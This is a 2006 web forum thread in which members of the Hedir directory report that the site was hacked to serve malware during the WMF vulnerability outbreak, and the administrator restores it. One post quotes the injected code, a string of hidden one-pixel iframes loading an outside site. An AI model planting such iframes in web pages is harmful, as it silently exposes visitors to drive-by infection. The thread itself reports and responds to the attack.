Hedir Web Directory and Webmaster Forum
Search  Register  LoginLogin 
Welcome to Hedir community. Hedir is a community helping to rank the sites on the basis of real customer feedback. Ranking is not based on automated checking of site properties but on the basis of experience with the site/business as a whole. Explore more about Hedir.
Home > Community > Announcements and Feedbacks >

WARNING! HEDIR Infected with WMF virus!
1 2  Next  
Author Message
Add to del.icio.us
Add to YahooMyWeb
Add to Digg
Add to Technorati
Add to Reddit
Add to Furl
Add to Spurl
Add to Simpy
Add to Blinklist
Add to Wink
winterfrost


winterfrost

Joined: 13 Sep 2005
Posts: 726
Location: Canada
23294 Hedir Points

winterfrost's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Tue Jan 03, 2006 3:08 pm    Post subject: WARNING! HEDIR Infected with WMF virus!
 
 

If you don't have anti-virus you are probably already infected.

Lakhya, it looks like you've been hacked again.

_________________
Alter-Ego profile migration - we need beta testers!
Tech tips and solutions
SwitchRight NTFS permission replacement utility
 
baggeroli

SuperMOD
baggeroli

Joined: 11 Oct 2005
Posts: 6556
Location: Netherlands
176190 Hedir Points

baggeroli's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Tue Jan 03, 2006 4:15 pm    Post subject:
 
 

Yup, it's a Trojan. KILL KILL KILL!!! Twisted Evil
 
baggeroli

SuperMOD
baggeroli

Joined: 11 Oct 2005
Posts: 6556
Location: Netherlands
176190 Hedir Points

baggeroli's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Tue Jan 03, 2006 4:19 pm    Post subject:
 
 

Hmm, it's accessing fiv. bestswf.com and blackh.info
 
Guest







100 Hedir Points

Guest's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Tue Jan 03, 2006 5:25 pm    Post subject:
 
 

This is above the normal html in the page. Was it there before and I never noticed?

Code:
<html><head><title></title></head><body><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html><html><head><title></title></head><bod y><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html>


With the errors referring to header information
 
Guest







100 Hedir Points

Guest's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Tue Jan 03, 2006 5:49 pm    Post subject:
 
 

What might an attacker use the vulnerability to do?
An attacker who successfully exploited this vulnerability could take complete control of the affected system. This issue is not known to be wormable. In a Web-based attack scenario, an attacker would host a Web site that exploits this vulnerability. An attacker would have no way to force users to visit a malicious Web site. Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.

More at http://www.microsoft.com/technet/security/advisory/912840.mspx


Tried to sign in but having trouble I guess.

Signed,
Google Junky
 
lakhya


lakhya

Joined: 01 Mar 2005
Posts: 473

15238 Hedir Points

lakhya's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Tue Jan 03, 2006 7:11 pm    Post subject: RE
Latest Blog Post : http://lakhya.hedir.com
 
 

Hi fellow members.

The site is fixed now and we have installed the necessary softwares to avoid these kinds of attacks.

We really regret for the inconvenience

Thanks

Lakhya

_________________
Evolution is always better than revolution. My attempt at Blogging!


Last edited by lakhya on Wed Jan 04, 2006 11:26 am
 
AjiNIMC


AjiNIMC

Joined: 11 Apr 2005
Posts: 516

18600 Hedir Points

AjiNIMC's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Tue Jan 03, 2006 7:17 pm    Post subject:
Latest Blog Post : Blog and earn!
 
 

Lakhya one of my friend is also facing the same problem, how do I fix it. Please help
_________________
http://www.idealwebtools.com/blog/orkut-banned-india/ - Orkut getting a ban in India, why? Is it fair? Politicians not liking it as some voices are raised against.
 
lakhya


lakhya

Joined: 01 Mar 2005
Posts: 473

15238 Hedir Points

lakhya's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Tue Jan 03, 2006 7:35 pm    Post subject:
Latest Blog Post : http://lakhya.hedir.com
 
 

Hi AjiNIMC, I had a back and replaced all the files and also given proper permission to the directories. The only way out is to replace the code in each and every file.
_________________
Evolution is always better than revolution. My attempt at Blogging!
 
winterfrost


winterfrost

Joined: 13 Sep 2005
Posts: 726
Location: Canada
23294 Hedir Points

winterfrost's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Tue Jan 03, 2006 9:48 pm    Post subject:
 
 

The website is still completely mangled for me.
_________________
Alter-Ego profile migration - we need beta testers!
Tech tips and solutions
SwitchRight NTFS permission replacement utility
 
baggeroli

SuperMOD
baggeroli

Joined: 11 Oct 2005
Posts: 6556
Location: Netherlands
176190 Hedir Points

baggeroli's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Tue Jan 03, 2006 9:59 pm    Post subject:
 
 

Yup, for me too. Sad
 
baggeroli

SuperMOD
baggeroli

Joined: 11 Oct 2005
Posts: 6556
Location: Netherlands
176190 Hedir Points

baggeroli's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Wed Jan 04, 2006 12:01 am    Post subject:
 
 

Everything normal again.
 
ADAC


ADAC

Joined: 21 Oct 2005
Posts: 164
Location: Shasta Lake Califonia, USA
5322 Hedir Points

ADAC's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Wed Jan 04, 2006 1:38 am    Post subject:
 
 

Another odd problem that I'm wondering might be linked to this virus. It seems that over the last 2 days a click to my site has been generated by every post I have made.

Not that this is bad if this is a person Very Happy However if this is a person I must be highly fascinating to him/her, the person has went to whats seems to be every post I've made and click to go to my site at least once, sometimes up to 10 times, hundreds of visits over 2 days. Shocked

_________________
SEO Tips
Web Programming
Kauai Beach Cottage
.edu Links!
 
Seņor COOL

Moderator
Seņor COOL

Joined: 27 Dec 2005
Posts: 1276

44503 Hedir Points

Seņor COOL's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Wed Jan 04, 2006 6:08 am    Post subject:
 
 

Seems to be okay from this end.
_________________
HEDir's Prince of Cool

Please review my newest site. Thanks.
 
Seņor COOL

Moderator
Seņor COOL

Joined: 27 Dec 2005
Posts: 1276

44503 Hedir Points

Seņor COOL's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Wed Jan 04, 2006 6:27 am    Post subject:
 
 

One thought though, lakhya:

I don't know if you can "track the hack" as it were, but depending on how it got there (FTP or whatever), there is probably at least one IP associated with it.

Could you compare and match the IP(s) used with any IP(s) from your raw logs during roughly the same time period?

_________________
HEDir's Prince of Cool

Please review my newest site. Thanks.
 
lakhya


lakhya

Joined: 01 Mar 2005
Posts: 473

15238 Hedir Points

lakhya's Home Page

web directory author feed
Author Feeds (Beta)
PostPosted: Wed Jan 04, 2006 6:38 am    Post subject:
Latest Blog Post : http://lakhya.hedir.com
 
 

ADAM: Yah, i will try to find out.

ADAC: are you still facing the problem?

_________________
Evolution is always better than revolution. My attempt at Blogging!
 
All times are GMT
1 2  Next  
Page 1 of 2

 
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You cannot download files in this forum

Our Features
» Web 2.0 tools
» Get a FREE blog
» Openmic - (Hedir Wiki)
» Hedir Points (Total: 2752122)

winterfrost's submissions
(Please review my submissions)



Community Feed
    rss feed

Terms of Use | About Us | Link to us | Web Directory
This work is licensed under cc by 2.0